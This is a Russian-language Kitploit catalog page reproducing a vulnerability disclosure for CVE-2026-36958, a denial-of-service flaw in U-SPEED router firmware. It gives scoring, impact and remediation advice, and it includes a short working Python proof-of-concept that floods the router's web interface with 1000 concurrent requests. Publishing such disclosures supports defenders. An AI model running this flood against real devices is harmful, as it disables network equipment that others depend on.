Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/kirubel-cve/cve-2026-36958
Анализ уязвимостейЭксплуатацияВеб-безопасностьСетевая безопасностьТестирование на Проникновение
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

Доказательство концепции для CVE-2026-36958 — уязвимости типа «отказ в обслуживании» в прошивке маршрутизатора U-SPEED, которая истощает ресурсы с помощью параллельных HTTP-запросов, приводя к тому, что веб-интерфейс перестаёт отвечать.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-36958: Отказ в обслуживании через одновременные HTTP-запросы

CVE ID: CVE-2026-36958 Дата: 2026-04-29 Обнаружил: Kirubel Solomne Производитель: U-SPEED Продукт: Маршрутизатор U-SPEED Версия прошивки: V1.0.0 CWE: CWE-400 — Неконтролируемое потребление ресурсов


Описание

Прошивка маршрутизатора U-SPEED V1.0.0 уязвима к отказу в обслуживании. Отправляя большое количество одновременных HTTP-запросов к случайным или несуществующим конечным точкам веб-интерфейса управления, злоумышленник может исчерпать системные ресурсы встроенного HTTP-сервера Boa. Это приводит к тому, что веб-интерфейс маршрутизатора перестаёт отвечать, и для восстановления нормальной работы может потребоваться ручная перезагрузка.


Оценка CVSS

Оценка CVSS v3.1: 7.5 (Высокая) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

МетрикаЗначение
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииОтсутствуют
Взаимодействие с пользователемОтсутствует
Влияние на конфиденциальностьОтсутствует
Влияние на целостностьОтсутствует
Влияние на доступностьВысокое

Доказательство концепции

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

Ожидаемое поведение: Сервер должен корректно обрабатывать одновременные соединения. Фактическое поведение: Веб-интерфейс перестаёт отвечать; требуется ручная перезагрузка.


Влияние

  • Веб-интерфейс управления становится недоступным
  • Возможное нарушение работы служб маршрутизации
  • Требуется ручная перезагрузка для восстановления функциональности

Устранение

  • Внедрить ограничение скорости соединений на веб-сервере Boa
  • Ограничить максимальное количество одновременных соединений с одного IP-адреса
  • Добавить механизм автоматического восстановления/сторожевого таймера

Хронология раскрытия

ДатаСобытие
2026-04-29Уязвимость обнаружена
2026-04-29Сообщено в MITRE
2026-04-29Присвоен CVE-2026-36958
2026-04-29Публичное раскрытие

Ссылки

  • MITRE CVE-2026-36958
  • CWE-400
  • Сайт производителя
Скачать инструмент